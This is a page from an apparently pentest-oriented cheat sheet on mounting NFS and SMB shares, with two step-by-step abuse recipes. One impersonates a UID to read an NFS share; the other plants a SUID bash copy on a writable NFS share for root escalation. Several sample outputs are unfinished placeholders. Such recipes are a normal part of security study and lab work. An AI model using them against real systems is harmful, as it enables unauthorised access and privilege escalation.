TLDRBins TLDRBins / Share Mount

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

List Shares

showmount -e <TARGET>

Sample Output:
$ showmount -e 10.10.11.191
Export list for 10.10.11.191:
/home/ross    *
/var/www/html *

Mount Share

sudo mkdir /mnt/share

Sample Output:
$ sudo mkdir /mnt/share

sudo mount -t nfs <TARGET>:<SHARE> /mnt/share/

Sample Output:
$ sudo mount -t nfs 10.10.11.191:/home/ross /mnt/share/

$ ls /mnt/share 
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos

Unmount Share

sudo umount /mnt/share/

Sample Output:
$ sudo umount /mnt/share/

Mount Share

sudo mount -t cifs //<TARGET>/<SHARE> /mnt

Sample Output:
TO-DO
# Without creds
sudo mount -t cifs -o user=,password= //<TARGET>/<SHARE> /mnt

Sample Output:
TO-DO
# With creds
sudo mount -t cifs -o user='<USER>',pass='<PASSWORD>' //<TARGET>/<SHARE> /mnt

Sample Output:
$ sudo mount -t cifs -o ro,user='localadmin',password='Secret123' //10.10.11.102/Shared /mnt

$ ls /mnt      
Documents  Software

Mount inside Windows

# Mount
net use \\localhost\c$ /u:'<DOMAIN>\<USER>' '<PASSWORD>'

Sample Output:
TO-DO
# Check
dir \\localhost\c$\users\administrator\desktop

Sample Output:
TO-DO

Abuse #1: Create Fake User to Read Misconfigured Share

# Check all mounted drives
mount

Sample Output:
$ mount     

---[SNIP]---
10.10.11.191:/home/ross on /mnt/share type nfs4 (rw,relatime,vers=4.2,rsize=262144,wsize=262144,namlen=255,hard,proto=tcp,timeo=600,retrans=2,sec=sys,clientaddr=10.10.14.31,local_lock=none,addr=10.10.11.191)

# Check how shares are mounted
cat /etc/exports

Sample Output:
$ cat /etc/exports
/var/nfsshare *(rw,sync,root_squash,no_all_squash)
/opt *(rw,sync,root_squash,no_all_squash)


+-----------------------------------------------------------------------------------------+
| root_squash  : running as root on local system will be treated as nobody user in target |
| no_all_squash: every other users permission will translate from local system to target  |
+-----------------------------------------------------------------------------------------+

Sample Output:
TO-DO

# Add dummy user
sudo adduser --uid <UID> dummy

Sample Output:
$ sudo adduser --uid 1001 dummy
useradd warning: dummy's uid 1001 outside of the UID_MIN 1000 and UID_MAX 60000 range.
New password: 
Retype new password: 
passwd: password updated successfully
Changing the user information for dummy
Enter the new value, or press ENTER for the default
        Full Name []: dummy
        Room Number []: 
        Work Phone []: 
        Home Phone []: 
        Other []: 
Is the information correct? [Y/n] Y

# Switch to dummy user
sudo su dummy -c bash

Sample Output:
$ sudo su dummy
$ id
uid=1001(dummy) gid=1001(dummy) groups=1001(dummy)

Abuse #2: Writable NFS Share to Privesc

1. Make a '/bin/bash' Copy in Target Machine

# Copy '/bin/bash' to writable NFS share
cp /bin/bash .

Sample Output:
(remote) www-data@mail01:/opt/share$ cp /bin/bash .

2. Create a Fake User

# In local machine
sudo adduser --uid <UID> <USER>

Sample Output:
$ sudo adduser --uid 1001 fakeuser
useradd warning: fakeuser's uid 1001 outside of the UID_MIN 1000 and UID_MAX 60000 range.
New password: 
Retype new password: 
passwd: password updated successfully
Changing the user information for fakeuser
Enter the new value, or press ENTER for the default
        Full Name []: fakeuser
        Room Number []: 
        Work Phone []: 
        Home Phone []: 
        Other []: 
Is the information correct? [Y/n] Y

3. Get the 'bash' Copy

# Mount share
sudo mount -t nfs <TARGET>:<SHARE> /mnt/share/

Sample Output:
TO-DO
# Switch to fakeuser
su fakeuser

Sample Output:
TO-DO
# Move 'bash' copy to a temp location
cp /mnt/share/bash /tmp/bash

Sample Output:
TO-DO

4. Move the 'bash' Copy Back to Target Machine

# In target machine
rm bash

Sample Output:
TO-DO
# Upload the 'bash' copy owned by fakeuser
cp /tmp/bash /mnt/share

Sample Output:
TO-DO

5. Set SUID bit of the 'bash' Copy

# In local machine
chmod u+s /mnt/share/bash

Sample Output:
TO-DO

6. Privesc

# In target machine, check
ls -l

Sample Output:
(remote) www-data@mail01:/opt/share$ ls -la
total 1380
drwxrwxrwx 2 nobody                 nogroup      4096 Aug  3 17:23 .
drwxr-xr-x 4 root                   root         4096 Jun 17  2023 ..
-rw-r--r-- 1 root                   root         6003 Jun 18  2023 backup.tar.gz
-rwsr-xr-x 1 peter.turner@example.com 902601108 1396520 Aug  3 17:23 bash

# Privesc
./bash -p

Sample Output:
TO-DO